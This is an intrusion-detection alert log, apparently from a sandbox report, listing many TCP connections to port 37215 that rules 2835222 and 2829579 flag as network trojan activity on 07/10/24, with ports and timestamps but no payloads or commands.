                  SID:2835222
                  Source Port:38994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.988456
                  SID:2829579
                  Source Port:60410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019424
                  SID:2829579
                  Source Port:56484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763825
                  SID:2829579
                  Source Port:34140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.462014
                  SID:2835222
                  Source Port:47288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.751241
                  SID:2829579
                  Source Port:33826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.588620
                  SID:2829579
                  Source Port:34698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623389
                  SID:2829579
                  Source Port:53168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.166033
                  SID:2829579
                  Source Port:42570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.753390
                  SID:2835222
                  Source Port:46028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.832031
                  SID:2835222
                  Source Port:49332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.933163
                  SID:2829579
                  Source Port:43584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.782831
                  SID:2829579
                  Source Port:48064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.956514
                  SID:2835222
                  Source Port:39756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.841938
                  SID:2835222
                  Source Port:34518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.091003
                  SID:2835222
                  Source Port:36862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.431901
                  SID:2829579
                  Source Port:58206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.530342
                  SID:2835222
                  Source Port:49786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.196889
                  SID:2835222
                  Source Port:33720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.524455
                  SID:2835222
                  Source Port:38218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.609280
                  SID:2835222
                  Source Port:39218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.828158
                  SID:2829579
                  Source Port:40180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.651213
                  SID:2829579
                  Source Port:53678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.757795
                  SID:2829579
                  Source Port:52448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.358183
                  SID:2835222
                  Source Port:36508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.368181
                  SID:2829579
                  Source Port:57860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.318439
                  SID:2829579
                  Source Port:49482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.684476
                  SID:2829579
                  Source Port:51304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.913134
                  SID:2829579
                  Source Port:60056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853169
                  SID:2835222
                  Source Port:46628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.051851
                  SID:2829579
                  Source Port:34024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909293
                  SID:2829579
                  Source Port:44614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.665617
                  SID:2835222
                  Source Port:58008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.419357
                  SID:2835222
                  Source Port:49716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488063
                  SID:2835222
                  Source Port:36170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.154220
                  SID:2829579
                  Source Port:37028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.134906
                  SID:2829579
                  Source Port:43278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2829579
                  Source Port:46002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.847227
                  SID:2829579
                  Source Port:58428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.559364
                  SID:2835222
                  Source Port:55418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.360429
                  SID:2829579
                  Source Port:42358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522078
                  SID:2835222
                  Source Port:57978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.803873
                  SID:2829579
                  Source Port:60136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.343986
                  SID:2829579
                  Source Port:41882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.998541
                  SID:2829579
                  Source Port:41906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.827027
                  SID:2829579
                  Source Port:45764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.143503
                  SID:2829579
                  Source Port:37616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869114
                  SID:2829579
                  Source Port:46278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640486
                  SID:2829579
                  Source Port:43344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.268554
                  SID:2829579
                  Source Port:35316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.791726
                  SID:2835222
                  Source Port:35436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.818987
                  SID:2829579
                  Source Port:45632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2835222
                  Source Port:59290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.343143
                  SID:2829579
                  Source Port:38630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.493465
                  SID:2829579
                  Source Port:49564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.973446
                  SID:2829579
                  Source Port:44046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.988913
                  SID:2835222
                  Source Port:48840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.267667
                  SID:2829579
                  Source Port:51174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.872706
                  SID:2835222
                  Source Port:57884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.898056
                  SID:2835222
                  Source Port:37398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169608
                  SID:2829579
                  Source Port:51400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.390012
                  SID:2835222
                  Source Port:45754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234468
                  SID:2829579
                  Source Port:33622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.476215
                  SID:2829579
                  Source Port:59342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.752135
                  SID:2835222
                  Source Port:55794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.542118
                  SID:2829579
                  Source Port:42136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.259600
                  SID:2829579
                  Source Port:56586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257964
                  SID:2829579
                  Source Port:33804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.403576
                  SID:2829579
                  Source Port:51474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.166168
                  SID:2829579
                  Source Port:57420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.981367
                  SID:2829579
                  Source Port:46528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423823
                  SID:2829579
                  Source Port:60878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.962148
                  SID:2829579
                  Source Port:54520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.627051
                  SID:2829579
                  Source Port:58684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.622738
                  SID:2835222
                  Source Port:45640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.971584
                  SID:2835222
                  Source Port:35484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.081502
                  SID:2835222
                  Source Port:41634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479455
                  SID:2835222
                  Source Port:59296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.782637
                  SID:2835222
                  Source Port:48948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.702243
                  SID:2829579
                  Source Port:49482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.675779
                  SID:2829579
                  Source Port:43848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.781764
                  SID:2829579
                  Source Port:49248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121517
                  SID:2829579
                  Source Port:37976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.428657
                  SID:2835222
                  Source Port:54204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.931862
                  SID:2835222
                  Source Port:46524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.636858
                  SID:2835222
                  Source Port:41202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.676361
                  SID:2829579
                  Source Port:58114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.584123
                  SID:2835222
                  Source Port:48070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.890895
                  SID:2835222
                  Source Port:36526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065444
                  SID:2835222
                  Source Port:47310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.874012
                  SID:2829579
                  Source Port:45734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.590532
                  SID:2829579
                  Source Port:58544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.658407
                  SID:2835222
                  Source Port:59642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.908233
                  SID:2829579
                  Source Port:52130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632030
                  SID:2835222
                  Source Port:44838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.183649
                  SID:2829579
                  Source Port:54684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.603262
                  SID:2829579
                  Source Port:49170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.565173
                  SID:2829579
                  Source Port:41424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423291
                  SID:2829579
                  Source Port:57240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.129379
                  SID:2829579
                  Source Port:40794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.667118
                  SID:2829579
                  Source Port:55708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.753198
                  SID:2835222
                  Source Port:41198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.109229
                  SID:2835222
                  Source Port:35616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.804937
                  SID:2835222
                  Source Port:56054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.533375
                  SID:2829579
                  Source Port:55586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655011
                  SID:2829579
                  Source Port:44724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.631742
                  SID:2835222
                  Source Port:42392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.056183
                  SID:2835222
                  Source Port:42370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.603771
                  SID:2829579
                  Source Port:53242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.260181
                  SID:2835222
                  Source Port:44916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.519267
                  SID:2829579
                  Source Port:36634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.901081
                  SID:2829579
                  Source Port:33150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.498788
                  SID:2835222
                  Source Port:40882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.998303
                  SID:2829579
                  Source Port:52468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.537875
                  SID:2835222
                  Source Port:39340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404259
                  SID:2835222
                  Source Port:40128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.948745
                  SID:2835222
                  Source Port:38034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.446211
                  SID:2829579
                  Source Port:42264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.783603
                  SID:2829579
                  Source Port:40278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2835222
                  Source Port:34444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.476844
                  SID:2829579
                  Source Port:43752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.067488
                  SID:2835222
                  Source Port:52558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926271
                  SID:2835222
                  Source Port:44340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.765869
                  SID:2829579
                  Source Port:47698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2835222
                  Source Port:45770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.089146
                  SID:2835222
                  Source Port:59576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.071097
                  SID:2829579
                  Source Port:49558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.395697
                  SID:2829579
                  Source Port:36544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.469991
                  SID:2829579
                  Source Port:51350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.413827
                  SID:2829579
                  Source Port:54956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.981369
                  SID:2835222
                  Source Port:36192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.130365
                  SID:2829579
                  Source Port:38528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376838
                  SID:2829579
                  Source Port:48774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.929800
                  SID:2835222
                  Source Port:44938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.869473
                  SID:2829579
                  Source Port:57290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.142588
                  SID:2829579
                  Source Port:50418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148665
                  SID:2835222
                  Source Port:54124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.642671
                  SID:2829579
                  Source Port:56426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.073080
                  SID:2835222
                  Source Port:48116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.867621
                  SID:2829579
                  Source Port:39250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.195980
                  SID:2835222
                  Source Port:51722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.836593
                  SID:2829579
                  Source Port:45362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842424
                  SID:2829579
                  Source Port:35596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.076379
                  SID:2829579
                  Source Port:44334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2829579
                  Source Port:41146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.925021
                  SID:2835222
                  Source Port:51242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.216046
                  SID:2829579
                  Source Port:52764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.624283
                  SID:2829579
                  Source Port:43476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2835222
                  Source Port:38578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.761974
                  SID:2835222
                  Source Port:43314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.534474
                  SID:2829579
                  Source Port:44264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.979211
                  SID:2835222
                  Source Port:53222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.353387
                  SID:2829579
                  Source Port:33216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.835368
                  SID:2829579
                  Source Port:57152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.886782
                  SID:2829579
                  Source Port:46410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.860339
                  SID:2835222
                  Source Port:45508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217527
                  SID:2835222
                  Source Port:60400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.872706
                  SID:2829579
                  Source Port:38338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.237415
                  SID:2835222
                  Source Port:53624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.209448
                  SID:2835222
                  Source Port:55426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.599203
                  SID:2835222
                  Source Port:40536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.453421
                  SID:2835222
                  Source Port:43924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.873378
                  SID:2835222
                  Source Port:34678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.165802
                  SID:2829579
                  Source Port:57380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751159
                  SID:2829579
                  Source Port:41236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828037
                  SID:2835222
                  Source Port:57264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589238
                  SID:2835222
                  Source Port:43338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881227
                  SID:2829579
                  Source Port:55988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.588431
                  SID:2829579
                  Source Port:50002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679025
                  SID:2835222
                  Source Port:35994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.126128
                  SID:2829579
                  Source Port:53102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2829579
                  Source Port:50412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2835222
                  Source Port:35664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861363
                  SID:2829579
                  Source Port:33072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.627003
                  SID:2835222
                  Source Port:53868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.593100
                  SID:2829579
                  Source Port:34506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.547260
                  SID:2835222
                  Source Port:43064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.866153
                  SID:2829579
                  Source Port:47778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.986664
                  SID:2835222
                  Source Port:57236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.225930
                  SID:2829579
                  Source Port:35778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.020582
                  SID:2829579
                  Source Port:49654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.904188
                  SID:2829579
                  Source Port:39596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.821569
                  SID:2829579
                  Source Port:35094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
